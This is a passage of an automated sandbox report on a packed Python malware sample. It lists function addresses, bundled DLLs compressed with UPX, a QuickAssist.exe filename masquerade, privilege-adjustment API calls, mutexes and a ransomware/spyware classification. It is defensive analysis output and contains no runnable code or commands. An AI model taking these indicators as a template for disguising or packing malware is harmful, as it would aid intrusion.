              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B1101E600_2_00007FF7B1101E60
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B11026800_2_00007FF7B1102680
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B10F9D2B0_2_00007FF7B10F9D2B
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B11115180_2_00007FF7B1111518
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B10FA55D0_2_00007FF7B10FA55D
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B110842C0_2_00007FF7B110842C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B110E5FC0_2_00007FF7B110E5FC
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B111A5D80_2_00007FF7B111A5D8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B11020640_2_00007FF7B1102064
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B11148600_2_00007FF7B1114860
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B11028840_2_00007FF7B1102884
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B11115180_2_00007FF7B1111518
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B11040C40_2_00007FF7B11040C4
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B10F90C00_2_00007FF7B10F90C0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B110F1100_2_00007FF7B110F110
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 2_2_00007FF8E75182682_2_00007FF8E7518268
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 2_2_00007FF8E754F81C2_2_00007FF8E754F81C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 2_2_00007FF8E7545CE02_2_00007FF8E7545CE0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 2_2_00007FF8E7542FF02_2_00007FF8E7542FF0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 2_2_00007FF8E75453A02_2_00007FF8E75453A0
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 2_2_00007FF8E7541BB02_2_00007FF8E7541BB0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF886B630279_2_00007FF886B63027
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2DAE1072_2_00007FF71D2DAE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2C0A2C72_2_00007FF71D2C0A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2E7B2472_2_00007FF71D2E7B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2BABA072_2_00007FF71D2BABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2BB54072_2_00007FF71D2BB540
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2B188472_2_00007FF71D2B1884
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2B82F072_2_00007FF71D2B82F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2C118072_2_00007FF71D2C1180
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2C54C072_2_00007FF71D2C54C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2FAE5072_2_00007FF71D2FAE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D30FE7472_2_00007FF71D30FE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2BCE8472_2_00007FF71D2BCE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2C8E6872_2_00007FF71D2C8E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2FEEA472_2_00007FF71D2FEEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2EAF0C72_2_00007FF71D2EAF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2B9EFC72_2_00007FF71D2B9EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2E0D2072_2_00007FF71D2E0D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2F9D7472_2_00007FF71D2F9D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D301DCC72_2_00007FF71D301DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2BEE0872_2_00007FF71D2BEE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2C1E0472_2_00007FF71D2C1E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2E804072_2_00007FF71D2E8040
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2C303072_2_00007FF71D2C3030
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2E007472_2_00007FF71D2E0074
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2DC05C72_2_00007FF71D2DC05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D3100F072_2_00007FF71D3100F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2D010472_2_00007FF71D2D0104
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2E5F4C72_2_00007FF71D2E5F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D31AF9072_2_00007FF71D31AF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D31DFD872_2_00007FF71D31DFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2EC00C72_2_00007FF71D2EC00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2F4FE872_2_00007FF71D2F4FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2F5A7072_2_00007FF71D2F5A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2EFA6C72_2_00007FF71D2EFA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2BCB1472_2_00007FF71D2BCB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D31AAC072_2_00007FF71D31AAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2ED91C72_2_00007FF71D2ED91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2DD97C72_2_00007FF71D2DD97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2B49B872_2_00007FF71D2B49B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2F69FD72_2_00007FF71D2F69FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2C8C3072_2_00007FF71D2C8C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2F5C8C72_2_00007FF71D2F5C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2D9D0C72_2_00007FF71D2D9D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D306D0C72_2_00007FF71D306D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2BDD0472_2_00007FF71D2BDD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2F4B3872_2_00007FF71D2F4B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D309B9872_2_00007FF71D309B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D30766072_2_00007FF71D307660
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2C86C472_2_00007FF71D2C86C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2EA71072_2_00007FF71D2EA710
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2F071072_2_00007FF71D2F0710
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2F270072_2_00007FF71D2F2700
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D3186D472_2_00007FF71D3186D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2DF5B072_2_00007FF71D2DF5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2EF59C72_2_00007FF71D2EF59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2C859872_2_00007FF71D2C8598
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D30260C72_2_00007FF71D30260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2E65FC72_2_00007FF71D2E65FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2C289072_2_00007FF71D2C2890
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2B888472_2_00007FF71D2B8884
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D3018A872_2_00007FF71D3018A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2F190C72_2_00007FF71D2F190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2E090472_2_00007FF71D2E0904
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2E38E872_2_00007FF71D2E38E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2C17C872_2_00007FF71D2C17C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D2D67E072_2_00007FF71D2D67E0
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D2BF24C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D2D7244
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D2CE21C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D302268
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D2CD2C0
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D2F02A4
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D301314
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D2B42E0
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D2F2164
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D2F81CC
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D3141CC
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D2F5468
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D2DD458
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D2BA504
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D30832C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D2E0374
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D2C2360
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D2DC3E0
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: String function: 00007FF71D2C8444 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: String function: 00007FF71D2F49F4 appears 53 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Code function: String function: 00007FF8E751E4D8 appears 79 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Code function: String function: 00007FF7B10F2B10 appears 47 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Code function: String function: 00007FF8E751E338 appears 50 times
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Static PE information: invalid certificate
Source: rar.exe.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Binary or memory string: OriginalFilename vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1330071281.00000162E1226000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameunicodedata.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000000.1323604931.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameQuickAssist.exej% vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1324723670.00000162E1226000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_lzma.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1329798498.00000162E1226000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesqlite3.dll0 vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1325023146.00000162E1226000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_socket.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1329595963.00000162E1226000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameselect.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1324098275.00000162E1226000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_bz2.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1325594493.00000162E1226000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_ssl.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1325471563.00000162E1226000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_sqlite3.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1324638401.00000162E1226000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_hashlib.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1323859878.00000162E1226000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dllT vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1324345518.00000162E1226000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_ctypes.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1324470480.00000162E1226000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_decimal.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1324838344.00000162E1226000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_queue.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1327152682.00000162E1226000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibsslH vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776316870.00007FF8F0D18000.00000004.00000001.01000000.0000000C.sdmp | Binary or memory string: OriginalFilename_socket.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772678970.00007FF8E738D000.00000004.00000001.01000000.0000000E.sdmp | Binary or memory string: OriginalFilename_ssl.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773198829.00007FF8E7504000.00000004.00000001.01000000.0000000B.sdmp | Binary or memory string: OriginalFilenamesqlite3.dll0 vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776819964.00007FF8F585C000.00000004.00000001.01000000.00000012.sdmp | Binary or memory string: OriginalFilename_queue.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1770691400.00007FF8E6E27000.00000004.00000001.01000000.0000000F.sdmp | Binary or memory string: OriginalFilenamelibcryptoH vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1768907588.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameQuickAssist.exej% vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1775764762.00007FF8F0953000.00000004.00000001.01000000.00000011.sdmp | Binary or memory string: OriginalFilename_hashlib.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776987075.00007FF8F6DAC000.00000004.00000001.01000000.0000000D.sdmp | Binary or memory string: OriginalFilenameselect.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776611713.00007FF8F1E08000.00000004.00000001.01000000.00000009.sdmp | Binary or memory string: OriginalFilename_bz2.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1771472421.00007FF8E729B000.00000004.00000001.01000000.00000013.sdmp | Binary or memory string: OriginalFilenameunicodedata.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773459694.00007FF8E7532000.00000004.00000001.01000000.0000000A.sdmp | Binary or memory string: OriginalFilename_sqlite3.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772036219.00007FF8E7353000.00000004.00000001.01000000.00000010.sdmp | Binary or memory string: OriginalFilenamelibsslH vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1777703826.00007FF8F9D77000.00000002.00000001.01000000.00000005.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dllT vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1775141445.00007FF8E7BBB000.00000004.00000001.01000000.00000004.sdmp | Binary or memory string: OriginalFilenamepython311.dll. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773719902.00007FF8E756C000.00000004.00000001.01000000.00000008.sdmp | Binary or memory string: OriginalFilename_lzma.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773968980.00007FF8E75D2000.00000004.00000001.01000000.00000006.sdmp | Binary or memory string: OriginalFilename_ctypes.pyd. vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Binary or memory string: OriginalFilenameQuickAssist.exej% vs SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: libcrypto-1_1.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9985088531464251
Source: libssl-1_1.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9920135147270115
Source: python311.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9993315999451067
Source: sqlite3.dll.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9977988591269841
Source: unicodedata.pyd.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9943153231216458
Source: R9FJX.zip.72.dr | Binary or memory string: )x.sLnp4
Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@144/56@2/2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Code function: 0_2_00007FF7B10F8560 GetLastError,FormatMessageW,WideCharToMultiByte
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D2CEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D2FB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe | Code function: 72_2_00007FF71D2D3144 GetDiskFreeSpaceExW
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8884:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:604:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8964:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9060:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8604:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:688:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8236:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8248:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8632:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3108:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9144:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6288:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1704:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8696:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8584:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Mutant created: \Sessions\1\BaseNamedObjects\z
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8380:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8640:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI76002
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
